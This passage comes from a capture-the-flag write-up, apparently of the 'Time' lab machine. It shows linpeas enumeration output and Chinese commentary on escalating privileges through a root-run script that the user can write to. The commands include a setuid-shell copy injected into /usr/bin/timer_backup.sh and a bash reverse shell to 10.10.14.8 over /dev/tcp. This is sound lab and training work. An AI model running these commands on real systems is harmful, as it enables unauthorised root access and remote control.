-rwxr-sr-x 1 root shadow 34K Feb 27  2019 /snap/core18/1705/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /snap/core18/1705/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /snap/core18/1705/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar  4  2019 /snap/core18/1705/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Jan  8  2020 /snap/core18/1705/usr/bin/wall
-rwxr-sr-x 1 root shadow 34K Feb 27  2019 /snap/core18/1885/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Feb 27  2019 /snap/core18/1885/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Mar 22  2019 /snap/core18/1885/usr/bin/chage
-rwxr-sr-x 1 root shadow 23K Mar 22  2019 /snap/core18/1885/usr/bin/expiry
-rwxr-sr-x 1 root crontab 355K Mar  4  2019 /snap/core18/1885/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 31K Mar  5  2020 /snap/core18/1885/usr/bin/wall

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so                 
/etc/ld.so.conf                                                                          
Content of /etc/ld.so.conf:                                                              
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf                                                            
  - /usr/local/lib                                                                       
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu                                                      
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Capabilities                                                                
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities          
══╣ Current shell capabilities                                                           
CapInh:  0x0000000000000000=                                                             
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:  0x0000000000000000=                                                             
CapPrm:  0x0000000000000000=
CapEff:  0x0000000000000000=
CapBnd:  0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb:  0x0000000000000000=


Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep                                                                       
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities          
                                                                                         
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  3222 Mar 11  2020 sbin.dhclient                                  
-rw-r--r-- 1 root root  3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 26245 Jul 10  2020 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root  2006 Aug  4  2020 usr.sbin.mysqld
-rw-r--r-- 1 root root  1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root  1385 Dec  7  2019 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls                  
files with acls in searched folders Not Found                                            
                                                                                         
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files        
total 36                                                                                 
drwxr-xr-x   2 root root 4096 Dec 16  2021 .
drwxr-xr-x 102 root root 4096 Dec 16  2021 ..
-rw-r--r--   1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--   1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rw-r--r--   1 root root  825 Apr 10  2020 apps-bin-path.sh
-rw-r--r--   1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--   1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--   1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--   1 root root  757 Nov  3  2019 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                                                   
                                                                                         
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No                                             
═╣ Credentials in fstab/mtab? ........... No                                             
═╣ Can I read shadow files? ............. No                                             
═╣ Can I read shadow plists? ............ No                                             
═╣ Can I write shadow plists? ........... No                                             
═╣ Can I read opasswd file? ............. No                                             
═╣ Can I write in network-scripts? ...... No                                             
═╣ Can I read root folder? .............. No                                             
                                                                                         
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                   
/home/pericles/.bash_history
/home/pericles/.lhistory
/root/
/var/www
/var/www/html/js
/var/www/html/js/main.js
/var/www/html/index.php
/var/www/html/vendor
/var/www/html/vendor/select2
/var/www/html/vendor/select2/select2.js
/var/www/html/vendor/select2/select2.min.js
/var/www/html/vendor/select2/select2.min.css
/var/www/html/vendor/select2/select2.css
/var/www/html/vendor/bootstrap
/var/www/html/vendor/bootstrap/js
/var/www/html/vendor/bootstrap/js/bootstrap.min.js
/var/www/html/vendor/bootstrap/js/bootstrap.js
/var/www/html/vendor/bootstrap/js/popper.min.js
/var/www/html/vendor/bootstrap/js/popper.js
/var/www/html/vendor/bootstrap/js/tooltip.js
/var/www/html/vendor/bootstrap/css
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css
/var/www/html/vendor/bootstrap/css/bootstrap.min.css.map
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.css
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css.map
/var/www/html/vendor/bootstrap/css/bootstrap.css
/var/www/html/vendor/bootstrap/css/bootstrap-grid.css
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.css.map
/var/www/html/vendor/bootstrap/css/bootstrap-grid.min.css.map

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rwxr-xr-x 1 root root 11119 Oct 20  2020 main.css                                       
-rwxr-xr-x 1 root root 12608 Dec 18  2017 img-01.png
-rwxr-xr-x 1 root root 1420 Dec 18  2017 main.js
-rwxr-xr-x 1 root root 4657 Oct 22  2020 /var/www/html/index.php
-rwxr-xr-x 1 root root 86814 Dec 13  2017 util.css
drwxr-xr-x 2 root root  4096 Dec 16  2021 icons
drwxr-xr-x 2 root root 4096 Dec 16  2021 animate
drwxr-xr-x 2 root root 4096 Dec 16  2021 css-hamburgers
drwxr-xr-x 2 root root 4096 Dec 16  2021 jquery
drwxr-xr-x 2 root root 4096 Dec 16  2021 montserrat
drwxr-xr-x 2 root root 4096 Dec 16  2021 poppins
drwxr-xr-x 2 root root 4096 Dec 16  2021 raleway
drwxr-xr-x 2 root root 4096 Dec 16  2021 select2
drwxr-xr-x 3 root root 4096 Dec 16  2021 Linearicons-Free-v1.0.0
drwxr-xr-x 4 root root 4096 Dec 16  2021 bootstrap
drwxr-xr-x 6 root root 4096 Dec 16  2021 font-awesome-4.7.0
total 100
total 20
total 4

╔══════════╣ Readable files belonging to root and readable by me but not world readable
                                                                                         
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)                                                                               
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files        
/dev/mqueue                                                                              
/dev/shm
/dev/shm/payload2kCy7H
/home/pericles
/opt/json_project/classpath
/opt/json_project/classpath/h2-1.4.199.jar
/opt/json_project/classpath/jackson-annotations-2.9.8.jar
/opt/json_project/classpath/jackson-core-2.9.8.jar
/opt/json_project/classpath/jackson-databind-2.9.8.jar
/opt/json_project/classpath/logback-core-1.3.0-alpha5.jar
/opt/json_project/parse.rb
/run/lock
/run/lock/apache2
/run/screen
/snap/core18/1705/run/lock
/snap/core18/1705/tmp
/snap/core18/1705/var/tmp
/snap/core18/1885/tmp
/snap/core18/1885/var/tmp
/tmp
/tmp/hsperfdata_pericles
/tmp/hsperfdata_pericles/12827
/tmp/linpeas.sh
/tmp/tmux-1000
/usr/bin/timer_backup.sh
/var/crash
/var/lib/php/sessions
/var/tmp
/var/www/html

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files        
  Group pericles:                                                                        
/usr/bin/timer_backup.sh                                                                 



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════      
                            ╚═════════════════════════╝                                  
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                        
/usr/bin/gettext.sh                                                                      
You own the script: /usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2024-01-13+13:40:01.1738805480 /usr/bin/timer_backup.sh                                  
2020-10-22+21:08:28.9674030500 /var/www/html/index.php
2020-10-22+19:13:27.2314030500 /opt/json_project/parse.rb
2020-10-22+19:04:30.1154030500 /opt/json_project/parse.rb.orig
2020-10-20+19:48:11.0231137870 /var/www/html/css/main.css
2020-09-20+12:07:15.9647426720 /etc/console-setup/cached_setup_terminal.sh
2020-09-20+12:07:15.9647426720 /etc/console-setup/cached_setup_keyboard.sh
2020-09-20+12:07:15.9647426720 /etc/console-setup/cached_setup_font.sh
2020-09-20+11:48:54.0488215730 /etc/network/if-up.d/mtuipv6
2020-09-20+11:48:54.0488215730 /etc/network/if-pre-up.d/mtuipv6

╔══════════╣ Unexpected in /opt (usually empty)
total 12                                                                                 
drwxr-xr-x  3 root root 4096 Dec 16  2021 .
drwxr-xr-x 20 root root 4096 Jan 13 13:43 ..
drwxr-xr-x  3 root root 4096 Dec 16  2021 json_project

╔══════════╣ Unexpected in root
/test                                                                                    

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/usr/bin/timer_backup.sh                                                                 
/tmp/hsperfdata_pericles/12827
/var/log/kern.log
/var/log/auth.log
/var/log/syslog
/var/log/journal/151d23267a7548479f1d63a9000ddfb3/system.journal
/var/log/journal/151d23267a7548479f1d63a9000ddfb3/user-1000.journal

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0                                                                         

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/pericles (limit 20)
total 44                                                                                 
drwxr-xr-x 7 pericles pericles 4096 Dec 16  2021 .
drwxr-xr-x 3 root     root     4096 Dec 16  2021 ..
lrwxrwxrwx 1 root     root        9 Oct  1  2020 .bash_history -> /dev/null
-rw-r--r-- 1 pericles pericles  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 pericles pericles 3771 Feb 25  2020 .bashrc
drwx------ 2 pericles pericles 4096 Dec 16  2021 .cache
drwx------ 3 pericles pericles 4096 Dec 16  2021 .config
drwx------ 3 pericles pericles 4096 Jan 13 13:42 .gnupg
lrwxrwxrwx 1 root     root        9 Oct  1  2020 .lhistory -> /dev/null
drwxrwxr-x 3 pericles pericles 4096 Dec 16  2021 .local
-rw-r--r-- 1 pericles pericles  807 Feb 25  2020 .profile
drwxr-xr-x 3 pericles pericles 4096 Dec 16  2021 snap
-r-------- 1 pericles pericles   33 Jan 13 12:27 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/js/main.js                                                                 
/var/www/html/index.php
/var/www/html/vendor/select2/select2.js
/var/www/html/vendor/select2/select2.min.js
/var/www/html/vendor/select2/select2.min.css
/var/www/html/vendor/select2/select2.css
/var/www/html/vendor/bootstrap/js/bootstrap.min.js
/var/www/html/vendor/bootstrap/js/bootstrap.js
/var/www/html/vendor/bootstrap/js/popper.min.js
/var/www/html/vendor/bootstrap/js/popper.js
/var/www/html/vendor/bootstrap/js/tooltip.js
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css
/var/www/html/vendor/bootstrap/css/bootstrap.min.css.map
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.css
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.min.css.map
/var/www/html/vendor/bootstrap/css/bootstrap.css
/var/www/html/vendor/bootstrap/css/bootstrap-grid.css
/var/www/html/vendor/bootstrap/css/bootstrap-reboot.css.map
/var/www/html/vendor/bootstrap/css/bootstrap-grid.min.css.map
/var/www/html/vendor/bootstrap/css/bootstrap-grid.min.css

╔══════════╣ Searching installed mail applications
                                                                                         
╔══════════╣ Mails (limit 50)
                                                                                         
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2743 Apr 23  2020 /etc/apt/sources.list.curtin.old                
-rw-r--r-- 1 root root 214 Oct 23  2020 /etc/systemd/system/timer_backup.timer
-rw-r--r-- 1 root root 159 Oct 23  2020 /etc/systemd/system/timer_backup.service
-rw-r--r-- 1 root root 106 Oct 23  2020 /etc/systemd/system/web_backup.service
-rw-r--r-- 1 root root 8729 Sep 10  2020 /usr/lib/modules/5.4.0-48-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 8161 Sep 10  2020 /usr/lib/modules/5.4.0-48-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 8737 Oct 15  2020 /usr/lib/modules/5.4.0-52-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 8169 Oct 15  2020 /usr/lib/modules/5.4.0-52-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 8729 Sep  4  2020 /usr/lib/modules/5.4.0-47-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 8161 Sep  4  2020 /usr/lib/modules/5.4.0-47-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 43888 Mar  9  2020 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so                                                                                     
-rw-r--r-- 1 root root 338 May  5  2020 /usr/share/ri/2.7.0/system/Bundler/EnvironmentPreserver/backup-i.ri
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 11070 Sep 20  2020 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rwxrw-rw- 1 pericles pericles 88 Jan 13 13:40 /usr/bin/timer_backup.sh
-rw-r--r-- 1 root root 0 Oct 15  2020 /usr/src/linux-headers-5.4.0-52-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Oct 15  2020 /usr/src/linux-headers-5.4.0-52-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237818 Oct 15  2020 /usr/src/linux-headers-5.4.0-52-generic/.config.old
-rw-r--r-- 1 root root 0 Sep 10  2020 /usr/src/linux-headers-5.4.0-48-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Sep 10  2020 /usr/src/linux-headers-5.4.0-48-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237780 Sep 10  2020 /usr/src/linux-headers-5.4.0-48-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-47/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-52/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 0 Sep  4  2020 /usr/src/linux-headers-5.4.0-47-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Sep  4  2020 /usr/src/linux-headers-5.4.0-47-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237780 Sep  4  2020 /usr/src/linux-headers-5.4.0-47-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-48/tools/testing/selftests/net/tcp_fastopen_backup_key.sh

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)             
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)                          
                                                                                         
╔══════════╣ Web files?(output limit)
/var/www/:                                                                               
total 12K
drwxr-xr-x  3 root     root     4.0K Dec 16  2021 .
drwxr-xr-x 14 root     root     4.0K Dec 16  2021 ..
dr-xr-xr-x  7 pericles pericles 4.0K Dec 16  2021 html

/var/www/html:
total 36K
dr-xr-xr-x 7 pericles pericles 4.0K Dec 16  2021 .
drwxr-xr-x 3 root     root     4.0K Dec 16  2021 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)                                                                         
-rw------- 1 root root 0 Jan 13 12:26 /run/snapd/lock/.lock                              
-rw-r--r-- 1 root root 0 Jan 13 12:26 /run/network/.ifstate.lock
-rw------- 1 root root 0 Apr 23  2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 0 Oct 20  2020 /etc/.java/.systemPrefs/.system.lock
-rw-r--r-- 1 root root 0 Oct 20  2020 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 root root 2044 Jul 15  2020 /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo
-rw-r--r-- 1 root root 1190 Dec 31  2019 /usr/share/doc/ruby-rspec-mocks/features/.nav
-rw-r--r-- 1 root root 1016 Oct  7  2019 /usr/share/doc/ruby-rspec-expectations/features/.nav
-rw-r--r-- 1 root root 1700 Dec 28  2019 /usr/share/doc/ruby-rspec-core/features/.nav
-rw-r--r-- 1 root root 22 Feb 19  2020 /usr/share/rubygems-integration/all/gems/rspec-core-3.9.1/lib/rspec/core/project_initializer/.rspec
-rw-r--r-- 1 pericles pericles 220 Feb 25  2020 /home/pericles/.bash_logout
-rw-r--r-- 1 landscape landscape 0 Apr 23  2020 /var/lib/landscape/.cleanup.user
-rw------- 1 root root 0 Mar 11  2020 /snap/core18/1705/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr  4  2018 /snap/core18/1705/etc/skel/.bash_logout
-rw------- 1 root root 0 Jul 24  2020 /snap/core18/1885/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr  4  2018 /snap/core18/1885/etc/skel/.bash_logout

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                                             
-rw------- 1 pericles pericles 32768 Jan 13 13:43 /tmp/hsperfdata_pericles/12827         
-rwxr-xr-x 1 pericles pericles 847920 Dec 28 06:40 /tmp/linpeas.sh
-rw-r--r-- 1 root root 61440 Oct 23  2020 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 2490 Sep 21  2020 /var/backups/alternatives.tar.1.gz

╔══════════╣ Searching passwords in history files
Binary file /usr/share/ri/2.7.0/system/Bundler/Thor/LineEditor/Readline/add_to_history%3f-i.ri matches
Binary file /usr/share/ri/2.7.0/system/IRB/Context/eval_history%3d-i.ri matches
/usr/share/ri/2.7.0/system/IRB/Context/eval_history-i.riU:RDoc::Attr[I"eval_history:ETI"IRB::Context#eval_history;TI"R;T:
                                publico:Doc::Markup::Documen:
                                                             @parts[o:RDoc::Markup::Paragraph;   I"JThe command result history limit. This method is not available until ;TI"C#eval_history= was called with non-nil value (directly or via ;TI"Jsetting <code>IRB.conf[:EVAL_HISTORY]</code> in <code>.irbrc</code>).;T:
/usr/share/ri/2.7.0/system/IRB/Context/eval_history-i.ri:@fileI"ib/irb/ext/history.rb;T:0@omit_headings_from_table_of_contents_below0F@I"IRB::Context;TcRDoc::NormalClass0
Binary file /usr/share/ri/2.7.0/system/IRB/Context/save_history%3d-i.ri matches
Binary file /usr/share/ri/2.7.0/system/IRB/Context/save_history-i.ri matches
/usr/share/rubygems-integration/all/gems/rake-13.0.1/lib/rake/thread_history_display.rb:      @stats   = stats
/usr/share/rubygems-integration/all/gems/rake-13.0.1/lib/rake/thread_history_display.rb:      @items   = { _seq_: 1  }
/usr/share/rubygems-integration/all/gems/rake-13.0.1/lib/rake/thread_history_display.rb:      @threads = { _seq_: "A" }

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                               
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc                                                                  
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py                                                                         
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/ruby/2.7.0/bundler/uri_credentials_filter.rb
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder


╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                         
╔══════════╣ Searching passwords inside logs (limit 70)
 base-passwd depends on libc6 (>= 2.8); however:                                         
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
2020-09-20 12:07:56,364 - ssh_util.py[DEBUG]: line 124: option PasswordAuthentication added with yes
2020-09-20 12:07:56,441 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon.
Binary file /var/log/journal/151d23267a7548479f1d63a9000ddfb3/user-1000.journal matches
Preparing to unpack .../base-passwd_3.5.47_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.8.1-1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Sep 20 11:49:20 ubuntu-server chage[15633]: changed password expiry for sshd
Sep 20 11:49:20 ubuntu-server usermod[15626]: change user 'sshd' password
Sep 20 16:55:47 ubuntu-server systemd[1]: Condition check resulted in Forward Password Requests to Plymouth Directory Watch being skipped.
Sep 20 16:55:47 ubuntu-server systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Sep 20 16:55:47 ubuntu-server systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Sep 20 16:56:11 ubuntu-server chpasswd[2091]: pam_unix(chpasswd:chauthtok): password changed for installer
Sep 20 16:56:11 ubuntu-server cloud-init[2090]: Set the following 'random' passwords
Setting up base-passwd (3.5.47) ...
Setting up passwd (1:4.8.1-1ubuntu5) ...
Shadow passwords are now on.
Unpacking base-passwd (3.5.47) ...
Unpacking base-passwd (3.5.47) over (3.5.47) ...
Unpacking passwd (1:4.8.1-1ubuntu5) ...
[    4.790077] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[    6.876981] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════       
                                ╚════════════════╝                                       
Regexes to search for API keys aren't activated, use param '-r' 


pericles@time:/tmp$ 

13、这里有几个这个提示，存在可疑的情况

╔══════════╣ 有趣的GROUP可写文件（不在主页中）（最多500个）
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files        
  Group pericles:                                                                        
/usr/bin/timer_backup.sh  



╔══════════╣ 路径中的.sh文件
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                        
/usr/bin/gettext.sh                                                                      
You own the script: /usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh


╔══════════╣ 在最近5分钟内修改了感兴趣的文件（限制为100）
/usr/bin/timer_backup.sh                                                                 
/tmp/hsperfdata_pericles/12827
/var/log/kern.log
/var/log/auth.log
/var/log/syslog
/var/log/journal/151d23267a7548479f1d63a9000ddfb3/system.journal
/var/log/journal/151d23267a7548479f1d63a9000ddfb3/user-1000.journal

14、这里面有有一个脚本连续出现了多次 /usr/bin/timer_backup.sh ，还是标红出现的

15、通过查看该脚本，发现这是一个打包的命令

pericles@time:/tmp$ ls -la /usr/bin/timer_backup.sh
ls -la /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Jan 13 13:55 /usr/bin/timer_backup.sh
pericles@time:/tmp$ cat /usr/bin/timer_backup.sh
cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/tmp$ 

16、这里原本想写一个root权限的bash的，结果发现有程序会对脚本进行内容效验

pericles@time:/tmp$ echo 'cp /bin/sh /tmp/sh;chmod u+s /tmp/sh' > /usr/bin/timer_backup.sh
<mp/sh;chmod u+s /tmp/sh' > /usr/bin/timer_backup.sh
pericles@time:/tmp$ find /etc/systemd/ -name timer_backup.service
find /etc/systemd/ -name timer_backup.service
/etc/systemd/system/timer_backup.service
pericles@time:/tmp$ cat /etc/systemd/system/timer_backup.service
cat /etc/systemd/system/timer_backup.service
[Unit]
Description=Calls website backup
Wants=timer_backup.timer
WantedBy=multi-user.target

[Service]
ExecStart=/usr/bin/systemctl restart web_backup.service
pericles@time:/tmp$ ls -la
ls -la
total 848
drwxrwxrwt  4 root     root       4096 Jan 13 13:42 .
drwxr-xr-x 20 root     root       4096 Jan 13 13:57 ..
drwxr-xr-x  2 pericles pericles   4096 Jan 13 13:34 hsperfdata_pericles
-rwxr-xr-x  1 pericles pericles 847920 Dec 28 06:40 linpeas.sh
drwx------  2 pericles pericles   4096 Jan 13 13:42 tmux-1000
pericles@time:/tmp$ ls
ls
hsperfdata_pericles
linpeas.sh
tmux-1000

pericles@time:/tmp$ cat /usr/bin/timer_backup.sh
cat /usr/bin/timer_backup.sh
cp /bin/sh /tmp/sh;chmod u+s /tmp/sh
pericles@time:/tmp$ ls
ls
hsperfdata_pericles
linpeas.sh
tmux-1000
pericles@time:/tmp$

pericles@time:/tmp$ cat /usr/bin/timer_backup.sh
cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
pericles@time:/tmp$ 

17、那还是插入一个反弹shell进去把

</10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
pericles@time:/tmp$ echo "bash -i >& /dev/tcp/10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
</10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
pericles@time:/tmp$ echo "bash -i >& /dev/tcp/10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
</10.10.14.8/10086 0>&1" >> /usr/bin/timer_backup.sh
